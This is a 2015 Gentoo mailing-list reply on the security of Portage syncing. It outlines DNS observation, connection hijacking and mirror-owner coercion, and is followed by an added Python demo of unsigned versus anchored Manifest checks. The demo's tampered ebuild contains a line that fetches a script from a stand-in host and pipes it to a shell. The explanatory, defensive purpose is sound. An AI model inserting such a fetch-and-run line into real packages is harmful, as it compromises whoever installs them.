From: Mark Kubacki
Date: Fri, 6 Mar 2015 14:53:02 +0100
Subject: Re: [gentoo-portage-dev] Security and Comparison of Portage with other Package Managers
To: gentoo-portage-dev@lists.gentoo.org
In-Reply-To: <54F8FB24.5060906@gentoo.org>
References: <54F86D04.3060804@whonix.org> <54F87698.5010104@gentoo.org> <54F8AB17.6050508@whonix.org> <54F8FB24.5060906@gentoo.org>

2015-03-06 1:56 GMT+01:00 Rick "Zero_Chaos" Farina :
>
> tl;dr webrsync-gpg is a built-in feature of the package manager which
> OPTIONALLY adds a significant amount of security against the attacks
> described on your website. This is not currently the default setting,
> however, it is described in many hardening guides for gentoo and widely
> used among the security conscious.

Without numbers backing that up this is speculation.

Given the default settings (without webrsync-gpg)…:

> (8) Wrong software installation.

Observe the DNS requests for the rsync or webrsync mirror. They're not
encrypted and give you a nice heads-up.

A. (data in transit) It's almost never HTTPS, and/or has no
authentication, so you can easily proceed to hijacking the connection.
  - Primed that way (DNS), insert a new rule into a router (or nameserver)
    along the path or within the DC to redirect the transaction. (See
    "quantum insert".)

B. (data at rest) Bribe or coerce the owner of the (portage tree) mirror.
Manifests and ebuilds are not centrally signed and there is no
authoritative "signing transparency"/record (see "certificate
transparency").

-- 
Mark
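Point B above is the one worth seeing in code: a Portage Manifest gives you integrity (the ebuild matches the hash next to it) but not authenticity (who wrote the hash). The block below is an added example, not code from this thread or from Portage. It models a one-ebuild mirror, shows the per-file check passing on an honest tree and failing on a naively swapped ebuild, then shows the real attack (mirror owner swaps the ebuild *and* regenerates the Manifest) passing the same check, and finally shows that a trust anchor obtained out of band catches it. Assumptions: Manifest lines are simplified to `EBUILD <name> <size> SHA512 <hex>` (real Manifests list several hash types), the ebuild contents and names are constructed, and a pinned SHA512 of the Manifest stands in for the GPG signature on the snapshot that `FEATURES="webrsync-gpg"` verifies against the Gentoo release key.

```python
# Added example, not code from the thread or from Portage: a minimal model of
# what an unsigned Portage Manifest does and does not protect against.
# Assumptions: Manifest lines of the form "EBUILD <name> <size> SHA512 <hex>"
# (real Manifests carry more hash types); a pinned SHA512 of the Manifest
# stands in for the GPG signature that FEATURES="webrsync-gpg" checks.
import hashlib
import re

# Constructed sample "mirror" contents: one ebuild, honest and tampered.
EBUILD_NAME = "hello-1.0.ebuild"
EBUILD_GOOD = b'EAPI=5\nDESCRIPTION="hello"\nsrc_install() { dobin hello; }\n'
EBUILD_EVIL = (b'EAPI=5\nDESCRIPTION="hello"\n'
               b'src_install() { dobin hello; curl -s http://mirror.example/p | sh; }\n')

MANIFEST_LINE = re.compile(r"^(EBUILD|MISC|AUX|DIST) (\S+) (\d+) SHA512 ([0-9a-f]{128})$")


def sha512_hex(data: bytes) -> str:
    return hashlib.sha512(data).hexdigest()


def make_manifest(files: dict) -> str:
    """Write a Manifest the way a mirror (honest or not) would: one hash line per file."""
    lines = [f"EBUILD {name} {len(data)} SHA512 {sha512_hex(data)}"
             for name, data in sorted(files.items())]
    return "\n".join(lines) + "\n"


def verify_manifest(manifest: str, files: dict) -> bool:
    """Integrity check only: each listed file must match its size and digest,
    and every file in the tree must be listed. Nothing here says who wrote
    the Manifest, so a mirror that rewrites ebuild and Manifest together passes."""
    seen = set()
    for line in manifest.splitlines():
        m = MANIFEST_LINE.match(line)
        if not m:
            return False
        _kind, name, size, digest = m.groups()
        data = files.get(name)
        if data is None or len(data) != int(size) or sha512_hex(data) != digest:
            return False
        seen.add(name)
    return seen == set(files)


def verify_tree(manifest: str, files: dict, trusted_manifest_digest: str) -> bool:
    """Authenticity on top of integrity: the Manifest itself must match a value
    obtained out of band. Here that is a pinned digest; with webrsync-gpg it is
    a GPG signature on the snapshot checked against the Gentoo release key."""
    if sha512_hex(manifest.encode()) != trusted_manifest_digest:
        return False
    return verify_manifest(manifest, files)


def run_scenarios() -> dict:
    """Walk through the attack in point B: the mirror owner swaps the ebuild
    and regenerates the Manifest. Returns each check's outcome by name."""
    honest = {EBUILD_NAME: EBUILD_GOOD}
    honest_manifest = make_manifest(honest)
    # The trust anchor is fixed before the mirror is compromised.
    anchor = sha512_hex(honest_manifest.encode())

    tampered = {EBUILD_NAME: EBUILD_EVIL}
    regenerated_manifest = make_manifest(tampered)

    return {
        # Honest mirror: everything checks out.
        "honest_manifest_ok": verify_manifest(honest_manifest, honest),
        # Naive tampering (ebuild only): the hash mismatch is caught.
        "tampered_ebuild_old_manifest": verify_manifest(honest_manifest, tampered),
        # Mirror rewrites the Manifest too: the unsigned Manifest passes.
        "tampered_ebuild_regenerated_manifest": verify_manifest(regenerated_manifest, tampered),
        # With an out-of-band anchor on the Manifest the swap is caught.
        "honest_anchored": verify_tree(honest_manifest, honest, anchor),
        "tampered_anchored": verify_tree(regenerated_manifest, tampered, anchor),
    }


if __name__ == "__main__":
    for name, ok in run_scenarios().items():
        print(f"{name}: {'pass' if ok else 'FAIL'}")
```

The third scenario is the whole argument in one line: with the default (unsigned) sync, "the Manifest verifies" means only that the mirror was consistent with itself. Only the last two scenarios, which bind the Manifest to something the mirror cannot forge, distinguish an honest tree from a rewritten one; that binding is what webrsync-gpg adds and what a plain rsync of an unsigned tree lacks.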